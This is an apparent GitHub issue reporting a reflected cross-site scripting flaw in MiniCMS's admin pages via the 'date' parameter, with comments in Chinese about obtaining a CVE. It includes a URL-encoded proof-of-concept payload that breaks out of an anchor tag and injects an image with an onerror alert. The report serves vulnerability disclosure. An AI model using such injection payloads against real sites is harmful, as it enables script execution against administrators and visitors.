MiniCMS has a XSS vulnerability

bg5sbk / MiniCMS

至简的个人网站内容管理系统

http://1234n.com/?projects/minicms/

227 stars 61 forks source link

Closed Ma3k4H3d closed 3 years ago

Ma3k4H3d commented 6 years ago

Vulnerability description

A xss vulnerability was discovered in MiniCMS. Vulnerability trigger point: MiniCMS-master/mc-admin/post.php?date=

poc:

/minicms/mc-admin/page.php?date=%22%3E%3C/a%3E%3Cimg%20src=%221%22%20onerror=alert(1)%3E%3Ca%3E

twoHub commented 6 years ago

提交cve的时候怎么写的我提交了都拿不到cve

Ma3k4H3d commented 6 years ago

提交cve的时候怎么写的我提交了都拿不到cve

老铁也是申请 CVE 啊？